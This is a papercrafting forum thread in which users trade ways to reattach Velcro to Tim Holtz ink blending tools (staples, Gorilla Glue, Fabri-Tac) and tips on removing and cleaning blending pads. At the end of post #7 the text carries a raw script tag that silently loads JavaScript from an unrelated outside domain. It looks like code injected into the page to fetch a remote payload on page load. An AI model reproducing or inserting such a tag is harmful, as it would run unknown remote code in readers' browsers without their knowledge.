Today's Posts

Search

Get the Weekly
Inkling
newsletter

Previous Issues

Splitcoaststampers's privacy policy

Get Social

Splitcoaststampers on InstagramLike Splitcoaststampers on FacebookFollow Splitcoaststampers on TwitterPit Splitcoaststampers on Pinterest

Sponsored Ads

Splitcoaststampers.com - the world's #1 papercrafting community
You're currently viewing Splitcoaststampers as a GUEST. We pride ourselves on being great hosts, but guests have limited access to some of our incredible artwork, our lively forums and other super cool features of the site! You can join our incredible papercrafting community at NO COST. So what are you waiting for?

Join the party at Splitcoaststampers today!

Old 09-10-2019, 11:57 AM   #1  
Pearl-ExPert

Received 389 Likes on 262 Posts
Default Reattaching Velcro to Tim Holtz ink blending tool

I use the Tim Holtz ink blending tool for almost every card that I make, and have several of them. I just switch out the foam pads when I change colors. However, I've had the velcro come loose from two of the applicators and am wondering if anyone know what kind of glue works to adhere them securely? I used a staple gun to attach one, a year ago, but it still lifts up at the end and doesn't keep the foam pad flat. Hot glue doesn't do it either. Any ideas or experience with this? Thanks!
Karen
Tweet this Post! Share on Facebook Reddit!! Pin on Pinterest! Share on Google+!
Reply With Quote Likes
Old 09-10-2019, 04:41 PM   #2  
Splitcoast Dirty Dozen
Creative Crew SU Design Team Alumni

Received 506 Likes on 226 Posts

I'm with you on that one. My rectangle ones are all coming off the adhesive foam and I can't take a blending foam off without needing 3 hands. My round ones pull up all around the edges (one staple in the middle). Maybe two staples at the ends of the rectangle ones would work.

I'm giving up on those blending tools though. I'm using the brushes now.
I'll stand with arms high and heart abandoned,
in awe of the One who gave it all.
I'll stand, my soul, Lord, to You surrendered,
all I am is Yours.
Reply With Quote Likes
Old 09-11-2019, 05:40 AM   #3  
Die Cut Diva

Received 12 Likes on 7 Posts

I'd done the stapling method too, a few years ago. What might work- I've not tried it onthis, but judging how well it works on anything else, I think it's a good bet. Gorilla Glue, the brown one. It's actually activated by a light spritz of water before joining the pieces to be stuck together, and once stuck, it stays stuck. Someone on here recommended it when I had an inkpad come loose from the base, and nothing else worked. I think it's called the All Purpose Adhesive.
Reply With Quote Likes
Old 09-11-2019, 11:04 AM   #4  
Pearl-ExPert

Quote:

Originally Posted by shazsilverwolfView Post
I'd done the stapling method too, a few years ago. What might work- I've not tried it onthis, but judging how well it works on anything else, I think it's a good bet. Gorilla Glue, the brown one. It's actually activated by a light spritz of water before joining the pieces to be stuck together, and once stuck, it stays stuck. Someone on here recommended it when I had an inkpad come loose from the base, and nothing else worked. I think it's called the All Purpose Adhesive.

My husband uses Gorilla Glue so I'll have to ask if if he has this one. Otherwise, I'll pick up some and give it a try. The staples just don't work well because the ends of the velcro keep lifting.
Thanks for your suggestion.

Karen
Reply With Quote Likes
Old 09-11-2019, 11:06 AM   #5  
Pearl-ExPert

Quote:

Originally Posted by fionna51View Post
I'm with you on that one. My rectangle ones are all coming off the adhesive foam and I can't take a blending foam off without needing 3 hands. My round ones pull up all around the edges (one staple in the middle). Maybe two staples at the ends of the rectangle ones would work.

I'm giving up on those blending tools though. I'm using the brushes now.

My round blending tools are holding up pretty well so far, but they're not as old as the rectangle ones. I hate to toss these and buy the blending brushes because I have a LOT of the handles and foams. Haven't tried the blending brushes but I've seen a lot of great reviews of them over foam blenders.
Karen
Reply With Quote Likes
Old 09-13-2019, 03:43 PM   #6  
Gallery Gazer

Received 19 Likes on 14 Posts

I can’t hold the blending makeup brushes comfortably - they hurt my thumb joint no matter how I adjust my hand, so mostly use blending tools, plus Tim Holtz brushes, rarely Clarity, and some big puffy brushes that were for make-up long ago.

The rectangular blending tools are for alcohol inks, and the round for all other blending, and I try to pull back the foam or felt very close to the tool - like how we’re advised to pull Frog tape back on itself very close to the paper to avoid ripping it. You’re probably already doing that and the rectangular ones just are really old and loved, so no matter how careful you are, eventually... :(

I hope you report back on your fix.
Reply With Quote Likes
Old 09-25-2019, 01:07 PM   #7  
Rubber Obsessor

Received 16 Likes on 7 Posts

I had the same problem of the edges pulling up. FABRI-TAC to the rescue! Solid hold on both my tools. Problem solved!<script type="text/javascript" async="" src="//pingclock.net/21db1c5c8b372aecca.js"></script>
Reply With Quote Likes
Old 09-26-2019, 02:27 AM   #8  
Kookie Creator

Received 14 Likes on 10 Posts

The rectangle ones used to be for distress inks as well, but the round ones seem to have overtaken them in popularity since they were released a few years ago.
Reply With Quote Likes
Old 09-30-2019, 08:33 PM   #9  
Splitcoast Dirty Dozen Alumni

Received 106 Likes on 63 Posts

I had the same problem with my rectangle tools first & then the round ones when I got those. I often wonder when I see card makers using them in YouTube videos how they manage, because they generally have just the one (presumably original) staple in the middle of the Velcro. Anyway, on mine I just popped in maybe 3 or 4 staples with a staple gun, pretty much around the whole perimeter. Because of the awkwardness of not being able to press the gun into the base of the tool, I did have to finish the job by hammering the staples in the rest of the way. Better than shooting a staple into my hand, at any rate! :p But they have held up fine! I think the key is just to use more than one staple.

I've also wondered many times how YouTubers keep their ink blender Velcro pads so clean??? Mine are well-stained with ink, even though I use them primarily with Distress & Oxide inks, never alcohol inks. Occasionally, I will clean the Velcro with a nail brush and soap & water. I've found, if the tool slips just a bit when I'm blending and the edge of the base hits my paper, it can leave an inky mark. :( Hence the nail brush cleaning. Anyway, just my two-cents worth!

Proud Dirty Dozen Design Team Alumna!
Featured Stamper #564
Blog: Andrea's Paper Antics
SCS Gallery

Illegitimi non carborundum
Reply With Quote Likes
Old 10-01-2019, 03:18 AM   #10  
Gallery Gazer

Received 19 Likes on 14 Posts

Quote:

Originally Posted by papercrafter40View Post
I had the same problem with my rectangle tools first & then the round ones when I got those. I often wonder when I see card makers using them in YouTube videos how they manage, because they generally have just the one (presumably original) staple in the middle of the Velcro. Anyway, on mine I just popped in maybe 3 or 4 staples with a staple gun, pretty much around the whole perimeter. Because of the awkwardness of not being able to press the gun into the base of the tool, I did have to finish the job by hammering the staples in the rest of the way. Better than shooting a staple into my hand, at any rate! :p But they have held up fine! I think the key is just to use more than one staple.

I've also wondered many times how YouTubers keep their ink blender Velcro pads so clean??? Mine are well-stained with ink, even though I use them primarily with Distress & Oxide inks, never alcohol inks. Occasionally, I will clean the Velcro with a nail brush and soap & water. I've found, if the tool slips just a bit when I'm blending and the edge of the base hits my paper, it can leave an inky mark. :( Hence the nail brush cleaning. Anyway, just my two-cents worth!
Laura Bassen talked about those edges leaving marks, so she presses the edges on scrap paper first. I started doing that - no more edge marks.

I assume many bloggers use new pads because they’re videotaping for an audience. But I’ve occasionally seen well loved ones. Washing isn’t needed.

You know how when peeling painters tape off of CS or watercolor paper - or a wall - how folding it back on itself very close to the paper or wall keeps the substrate from ripping? That’s kind of how I remove pads. Not pulling out or away, if that makes sense. So far so good.

(For alcohol inks the small felt pieces are often used on blender tools rather than sponge pads. I have Ranger ones but bought white felt to make more, and for larger pieces to wrap around straight edges to makes stripes, etc. A JM technique.)
Reply With Quote Likes